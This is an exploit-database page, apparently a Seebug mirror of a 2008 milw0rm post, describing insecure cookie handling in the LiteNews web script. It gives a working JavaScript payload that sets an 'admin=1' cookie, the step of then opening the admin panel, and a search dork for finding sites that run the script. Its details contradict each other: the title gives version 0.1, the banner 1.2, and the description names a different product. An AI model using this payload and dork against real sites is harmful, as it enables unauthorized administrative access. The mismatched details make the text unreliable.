Lucene search

K
seebugRootSSV:65638
HistoryJul 01, 2014 - 12:00 a.m.

LiteNews <= 0.1 Insecure Cookie Handling Vulnerability

2014-07-0100:00:00
Root
www.seebug.org
87

No description provided by source.


                                                #########################################################################
#                                                                       #
#         litenews-01 &#60;= 1.2 Insecure Cookie Handling Vulnerability     #
#                                                                       #
#########################################################################
#                                                                       #
# AUTHOR     : Scary-Boys						#
# HOME       : http://scary-boys.com					#
# Download   : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
#                                                                       #
#########################################################################
#                                                                       #
#     DorKs  : &#34;Powered By litenews&#34;         			        #
#                                                                       #
#########################################################################
#                                                                       #
#  DESCRIPTION :                                        		#
#  Maian Guestbook suffers from a insecure cookie                       #
# the admin panel only checks if the cookie exists. 		        #
#                                                                       #
#########################################################################
#                                                                       #
#  Vulnerability :                                                      #
#                                                                       #
#  javascript:document.cookie = &#34;admin=1; path=/&#34;;                      #
#                                                                       #
#########################################################################
#                                                                       #
# after running the javascript, Go to &#34;/admin/index.php&#34; & Refresh      #
#                                                                       #
#########################################################################

# milw0rm.com [2008-08-05]